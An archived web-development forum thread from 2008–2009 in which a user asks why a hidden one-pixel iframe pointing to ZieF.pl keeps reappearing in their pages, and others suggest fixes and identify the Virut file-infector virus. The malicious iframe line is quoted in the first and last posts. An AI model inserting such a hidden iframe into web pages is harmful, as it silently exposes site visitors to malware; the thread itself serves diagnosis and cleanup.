...

View Full Version : I need help!!



Nova_Core
10-25-2008, 05:49 AM
I'm building a webpage but for some reason i'm getting this code <iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe> I've tried everything to attempt to get rid of this code but for some reason it keeps coming back. HOW DO I GET RID OF THIS! I need help its destroying my life lol!!! But seriously if anyone has ran into this problem please let me know what to do.

rangana
10-25-2008, 07:18 AM
How did that code came into your markup? That's odd.

You could remove that by:


<script type="text/javascript">
window.onload=function()
{
var tags=document.getElementsByTagName('iframe');
for(var i=0;i<tags.length;i++)
tags[i].style.display=tags[i].src.match(/zief.pl/gi)?'none':''; // Hide
// tags[i].parentNode.removeChild(tags[i]); // Remove the iframe
}
</script>

gnomeontherun
10-25-2008, 12:11 PM
Is it getting inserted when you write the code on the computer, or after you upload it to the server?

You might want to check if your host account has been hacked. Also try using a different code editor if you think it was inserted before uploading.

VIPStephan
10-25-2008, 12:35 PM
If I insert the iframe URL into my adress bar I get a warning that this site (domain) is probably a hijacker site (only do this on Mac/Unix and with the latest Firefox, or if you have some really good security software). So you should update or change your CMS software or whatever (’cause I’d guess this is the weak part) and/or contact your host.

Nova_Core
10-25-2008, 07:42 PM
Thank you all for the reply.

rangana is this a JS code that I put in all my pages or is it a code that I can put in a new HTML file and run it to run through all my pages and remove it.

What's happening is it inserts this code into all my web files (HTML and PHP) and not just 1 line. When I delete the line, hit save and re-open it it's back again.
I was using Dreamweaver CS3 to create/edit the files as well as trying notepad but no matter what I edit with this comes back.

The code is getting inserted on my computer before I upload it to the server

jeremywilken I checked my host file before and didn't notice any entries other then the 127.0.0.1 localhost
I just checked now and noticed that at the very top is where an entry was placed. 127.0.0.1 zief.pl
This could be it so I'm going to remove it and see what happens.

I'll let you guys know if it solves my problem or not.

gnomeontherun
10-25-2008, 08:02 PM
It sounds like your hosting has been hacked. Check in your .htaccess file, check in your cgi-bin, check EVERY file for tampering, and then check with your hosting to help you. Sometimes the hosting provider is able to find these things much faster. Good luck!

oracleguy
10-26-2008, 07:48 AM
It sounds like your hosting has been hacked. Check in your .htaccess file, check in your cgi-bin, check EVERY file for tampering, and then check with your hosting to help you. Sometimes the hosting provider is able to find these things much faster. Good luck!

Well if the OP says it shows up on his computer before the file is uploaded, it sounds like an issue with his computer not his host.

gnomeontherun
10-26-2008, 11:55 AM
Agh, misread. Sorry, retract my previous post...thanks for the catch.

This is happening a lot now that I live in a non-English speaking country.

balbritton
02-26-2009, 11:25 PM
Hi everyone,

I found this forum on a Google search, and I've registered to warn everyone about <iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>

This code is injected into HTM, PHP, and ASP by a virus called "virut."

See:
http://miekiemoes.blogspot.com/2009/02/virut-and-other-file-infectors-throwing.html

For technical details, visit:
http://securitylabs.websense.com/content/Blogs/3300.aspx

And, of course, Google "virut.

If your PC is infected, take it off of any networks, be very careful with USB drives, and disconnect it from the internet. Virut infections have begun to skyrocket - be careful with this one. It's nasty.



EZ Archive Ads Plugin for vBulletin Copyright 2006 Computer Help Forum